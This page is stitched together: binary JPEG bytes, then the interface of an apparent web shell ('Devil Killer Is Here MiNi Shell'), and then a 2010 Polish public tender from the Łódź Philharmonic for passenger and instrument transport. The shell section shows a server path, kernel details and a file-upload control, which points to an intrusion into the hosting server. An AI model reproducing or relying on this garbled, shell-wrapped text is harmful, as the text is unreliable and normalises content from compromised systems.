JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/384974-N-2010.html

<p class="kh_header"><b>Łódź: usługa w zakresie transportu drogowego</b><br>
<b>Numer ogłoszenia: 384974 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Filharmonia Łódzka im. Artura Rubinsteina , ul. Narutowicza 20/22, 90-135 Łódź, woj. łódzkie, tel. 0-42 664 79 18, faks 0-42 664 79 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.filharmonia.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa w zakresie transportu drogowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa transportu drogowego świadczona od dnia podpisani umowy do 30.09.2011r. 

Zadanie 1

Przewóz osobowy samochodem do 9 osób 

Liczba planowanych transportów  - około 100 
Najczęstsze trasy - Łódź - Warszawa - Łódź 


Samochody maksymalnie 3-letnie 
Wykwalifikowana kadra ze znajomością języka angielskiego 
Suma dodatkowego ubezpieczenia 500,000 EURO szkód w mieniu
Suma dodatkowego ubezpieczenia 2500,000 EURO szkód na osobie
Pakiet ubezpieczenia który w razie awarii zobowiązuje ubezpieczyciela do natychmiastowego podstawienia auta  tej samej klasy pojazdu aby móc kontynuować podróż
Internet
Rozkładane fotele 
Miejsce specjalnie oddzielone na instrumenty
Brak krat leasingowych w samochodach 
Brak naliczania dodatkowej opłaty za oczekiwania na pasażerów przy opóźnieniach środków transportu. 
Gwarancja tej samej ceny  bez względu na godziny  jak i dni tygodnia i na ilość pasażerów.
Wykonawca musi mieć każdorazowo możliwość zapewnienia co najmniej 2 takich pojazdów jednocześnie. W przypadku awarii pojazdu, której nie da się usunąć  w przeciągu 1 godziny (poza obszarem Łodzi) i  w przypadku każdej awarii na terenie Łodzi, Wykonawca jest zobowiązany niezwłocznie zapewnić pojazd zastępczy o takich samych parametrach. 
W przypadku wyjazdu dłuższego niż 1 dzień wykonawca (tj kierowca) ma zapewniony nocleg oraz posiłek. 
Zamówienie będzie  dokonane nie później niż na 24 godziny przed planowanym wyjazdem. 

Planowana ilość kilometrów - 8 000 

Zadanie 2 

Transport zbiorowy osób w kraju i za granicą

Liczba planowanych transportów  - 15 

Autokary klasy VIP i LUX maksymalnie 5-letnie
Autokary o ilości miejsc:  26; 34; 49; 51; 56; 61 w zależności od potrzeb 
Autokary wyposażone w: 
-Klimatyzację
-DVD
-nagłośnienie
-fotele lotnicze rozkładane i odsuwane na boki
-toaletę
-minibarek  
-lodówkę  
-Indywidualne oświetlenie dla każdego z pasażerów 
Autokary muszą posiadać silniki przystosowane do wymogów ekologicznych - minimum Euro 4. 
Wykonawca musi mieć każdorazowo możliwość zapewnienia dwóch takich samych autokarów. W przypadku awarii autokaru, której nie da się usunąć  w przeciągu 3 godzin (w przypadku awarii na terenie Polski) i  przeciągu 8 godzin (w przypadku awarii poza granicami Polski) Wykonawca jest zobowiązany niezwłocznie zapewnić autokar zastępczy o takich samych parametrach. 
Wykwalifikowani kierowcy ze znajomością jeżyka angielskiego oraz z doskonałą znajomością każdej trasy.
Suma dodatkowego ubezpieczenia 500,000 EURO szkód w mieniu
Suma dodatkowego ubezpieczenia 2500,000 EURO szkód na osobie
W przypadku wyjazdu dłuższego niż 1 dzień wykonawca (tj kierowca, - y) ma zapewniony noclegi oraz posiłki. 
Zamówienie będzie  dokonane nie później niż na  30 dni przed planowanym wyjazdem. 

Planowana ilość kilometrów:
- w kraju 2 500 
- za granicą 7 500 

Zadanie 3 

Wyspecjalizowany transport do przewozu instrumentów i sprzętu poza granicami województwa łódzkiego 

Liczba transportów - 10

Samochody wyposażone w: 
- akcesoria niezbędne do zabezpieczenia instrumentów w trakcie transportu - tak by instrumenty pozostały nieruchome w trakcie jazdy
- ogrzewanie przestrzeni ładunkowej 
- rampę, lub pomost załadowczy 

Kierowcy posiadający: 

- znajomość instrumentarium orkiestrowego
- znajomość technik przewozu instrumentów muzycznych  oraz ich rozładunku i załadunku 
- wiedzę na temat przygotowania estrady do występu orkiestry 
- znajomość specyfiki pracy z orkiestrą
-  zakres obowiązków kierowców wchodzi rozładunek i załadunek samochodów 
Przy orkiestrze liczącej powyżej 50 osób konieczność drugiego pracownika/kierowcy.
Suma dodatkowego ubezpieczenia 500,000 EURO szkód w mieniu
W przypadku wyjazdu dłuższego niż 1 dzień wykonawca (tj kierowca, - y) ma zapewniony noclegi oraz posiłki. 
Zamówienie będzie  dokonane nie później niż na  30 dni przed planowanym wyjazdem. 
Wykonawca musi mięć każdorazowo możliwość zapewnienia dwóch takich samych autokarów. W przypadku awarii autokaru, której nie da się usunąć  w przeciągu 3 godzin (w przypadku awarii na terenie Polski) i  przeciągu 8 godzin (w przypadku awarii poza granicami Polski) Wykonawca jest zobowiązany niezwłocznie zapewnić autokar zastępczy o takich samych parametrach. 

Planowana ilość kilometrów:
- w kraju 2 500 
- za granicą 7 500 

Zadanie 4 

Transport instrumentów i sprzętu na terenie Łodzi i województwa 

Liczba transportów  - 20  

Samochody wyposażone w:
- akcesoria niezbędne do zabezpieczenia instrumentów w trakcie transportu - tak by instrumenty pozostały nieruchome w trakcie jazdy
 - rampę, lub pomost załadowczy 
Suma dodatkowego ubezpieczenia 500,000 EURO szkód w mieniu
W przypadku wyjazdu dłuższego niż 1 dzień wykonawca (tj kierowca, - y) ma zapewniony noclegi oraz posiłki. 
Zamówienie będzie  dokonane nie później niż na  10 dni przed planowanym wyjazdem. 
W przypadku awarii pojazdu, której nie da się usunąć  w przeciągu 1 godziny (poza obszarem Łodzi) i  w przypadku każdej awarii na terenie Łodzi, Wykonawca jest zobowiązany niezwłocznie zapewnić pojazd zastępczy o takich samych parametrach.

Planowana ilość kilometrów - 300.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium:
	a/ dla zad. 1     400 zł
b/ dla zad. 2  1 000 zł. 
c/ dla zad. 3     500 zł
d/ dla zd. 4   - 
Wadium może być wniesione w wybranej przez Wykonawcę formie:
a/ pieniądzu na rachunek bankowy 76 1240 3028 1111  0000 2823 5084
b/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym , że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c/ gwarancjach bankowych;
d/ gwarancjach ubezpieczeniowych;
e/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu PARP (Dz. U. 2007 Nr 42 poz. 275)

Wadium wnosi się przed upływem terminu składania ofert.
W przypadku wadium wnoszonego w pieniądzu, kwota wadium musi znajdować się na rachunku Zamawiającego przed upływem terminu składnia ofert. 

Zamawiający zwraca wadium niezwłocznie wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza. Wykonawcy, którego ofert została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu 
           Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał 
           ofertę przed upływem terminu składania ofert; 
           Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu
           zwrócono wadium w związku z wyborem innej oferty lub unieważnieniem postępowania, 
           jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako
           najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez 
           Zamawiającego. 
           Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami
           wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
           pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za
           przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
          Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi
          na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p., nie złożył dokumentów lub
          oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że
          udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
          Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta
          została wybrana: 
          1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie; 
          2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
          3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże iż posiada właściwą licencję/zezwolenie na wykonywanie krajowego/międzynarodowego transportu drogowego osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie conajmniej 1 usługę transportową w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj. usługa transportu osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować pojazdami odpowiednimi dla wykonania konkretnego zadania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że osoby którymi dysponuje lub będzie dysponować i które będą uczestniczyć w wykonywaniu zamówienia posiadają kwalifikacje zawodowe niezbędne do wykonywania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek ten zostanie spełniony jeśli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.filharmonia.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Filharmonia Łódzka im. Artura Rubinsteina
90-135 Łódź, ul. Narutowicza 20/22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 09:30, miejsce: Filharmonia Łódzka im. Artura Rubinsteina
90-135 Łódź, ul. Narutowicza 20/22 
sekretariat, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przewóz osobowy samochodem do 9 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba planowanych transportów  - około 100 
Najczęstsze trasy - Łódź - Warszawa - Łódź 


Samochody maksymalnie 3-letnie 
Wykwalifikowana kadra ze znajomością języka angielskiego 
Suma dodatkowego ubezpieczenia 500,000 EURO szkód w mieniu
Suma dodatkowego ubezpieczenia 2500,000 EURO szkód na osobie
Pakiet ubezpieczenia który w razie awarii zobowiązuje ubezpieczyciela do natychmiastowego podstawienia auta  tej samej klasy pojazdu aby móc kontynuować podróż
Internet
Rozkładane fotele 
Miejsce specjalnie oddzielone na instrumenty
Brak krat leasingowych w samochodach 
Brak naliczania dodatkowej opłaty za oczekiwania na pasażerów przy opóźnieniach środków transportu. 
Gwarancja tej samej ceny  bez względu na godziny  jak i dni tygodnia i na ilość pasażerów.
Wykonawca musi mieć każdorazowo możliwość zapewnienia co najmniej 2 takich pojazdów jednocześnie. W przypadku awarii pojazdu, której nie da się usunąć  w przeciągu 1 godziny (poza obszarem Łodzi) i  w przypadku każdej awarii na terenie Łodzi, Wykonawca jest zobowiązany niezwłocznie zapewnić pojazd zastępczy o takich samych parametrach. 
W przypadku wyjazdu dłuższego niż 1 dzień wykonawca (tj kierowca) ma zapewniony nocleg oraz posiłek. 
Zamówienie będzie  dokonane nie później niż na 24 godziny przed planowanym wyjazdem. 

Planowana ilość kilometrów - 8 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Transport zbiorowy osób w kraju i za granicą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba planowanych transportów  - 15 

Autokary klasy VIP i LUX maksymalnie 5-letnie
Autokary o ilości miejsc:  26; 34; 49; 51; 56; 61 w zależności od potrzeb 
Autokary wyposażone w: 
-Klimatyzację
-DVD
-nagłośnienie
-fotele lotnicze rozkładane i odsuwane na boki
-toaletę
-minibarek  
-lodówkę  
-Indywidualne oświetlenie dla każdego z pasażerów 
Autokary muszą posiadać silniki przystosowane do wymogów ekologicznych - minimum Euro 4. 
Wykonawca musi mieć każdorazowo możliwość zapewnienia dwóch takich samych autokarów. W przypadku awarii autokaru, której nie da się usunąć  w przeciągu 3 godzin (w przypadku awarii na terenie Polski) i  przeciągu 8 godzin (w przypadku awarii poza granicami Polski) Wykonawca jest zobowiązany niezwłocznie zapewnić autokar zastępczy o takich samych parametrach. 
Wykwalifikowani kierowcy ze znajomością jeżyka angielskiego oraz z doskonałą znajomością każdej trasy.
Suma dodatkowego ubezpieczenia 500,000 EURO szkód w mieniu
Suma dodatkowego ubezpieczenia 2500,000 EURO szkód na osobie
W przypadku wyjazdu dłuższego niż 1 dzień wykonawca (tj kierowca, - y) ma zapewniony noclegi oraz posiłki. 
Zamówienie będzie  dokonane nie później niż na  30 dni przed planowanym wyjazdem. 

Planowana ilość kilometrów:
- w kraju 2 500 
- za granicą 7 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyspecjalizowany transport do przewozu instrumentów i sprzętu poza granicami województwa łódzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba transportów - 10

Samochody wyposażone w: 
- akcesoria niezbędne do zabezpieczenia instrumentów w trakcie transportu - tak by instrumenty pozostały nieruchome w trakcie jazdy
- ogrzewanie przestrzeni ładunkowej 
- rampę, lub pomost załadowczy 

Kierowcy posiadający: 

- znajomość instrumentarium orkiestrowego
- znajomość technik przewozu instrumentów muzycznych  oraz ich rozładunku i załadunku 
